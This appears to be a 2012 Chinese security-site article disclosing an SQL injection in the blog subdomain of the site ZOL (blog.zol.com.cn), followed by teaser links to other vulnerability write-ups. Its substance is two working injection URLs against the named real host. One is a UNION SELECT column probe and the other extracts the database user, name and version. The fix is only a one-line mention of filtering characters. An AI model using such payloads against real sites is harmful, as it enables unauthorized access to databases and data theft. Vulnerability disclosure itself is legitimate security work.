当前位置：代码网 > 服务器>网络安全>漏洞分析 > 中关村在线博客子站SQL注入及修复方案

中关村在线博客子站SQL注入及修复方案

中关村在线博客子站SQL注入及修复方案分析一下中关村的博客的漏洞... 12-07-07

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,concat(user(),0x7c,database(),0x7c,version()),4,5--

修复方案：
过滤参数提交非法字符或者拦截敏感字符等等。。。

微软"后门"ntsd的发现与清除

微软"后门"ntsd的发现与清除所谓后门,就是ntsd的远程调试功能... 12-07-24 …

2012年07月24日 • 网络安全
建站之星全版本后台通杀getshell的解析与解决方法

建站之星全版本后台通杀getshell的解析与解决方法建站之星全版本后台通杀getshell的解析... 12-06-29 [阅读全文]
WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法

WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法来分析一下WEBSHELL箱子系统的漏洞... 12-08-17 [阅读全文]
新浪微博及招聘的两个XSS漏洞分析与解决方法

新浪微博及招聘的两个XSS漏洞分析与解决方法新浪微博搜索存储型XSS漏洞：两洞结合利用... 12-06-29 …

2012年06月29日 • 网络安全
网站的九大敌人有哪些千万别给Web应用漏洞可趁之机

网站的九大敌人有哪些千万别给Web应用漏洞可趁之机过去，网站的内容大多是静态的。随着HTML5的流行，Web应用进入一个崭新阶段，内容的动态化和实时共享让阻... [阅读全文]
利用Metasploit编写Adobe Flash漏洞模块 (CVE-2012-0779)

利用Metasploit编写Adobe Flash漏洞模块 (CVE-2012-0779)上个月爆了一个Adobe Flash的漏洞，影响Windows, M... [阅读全文]


验证码：

相关文章: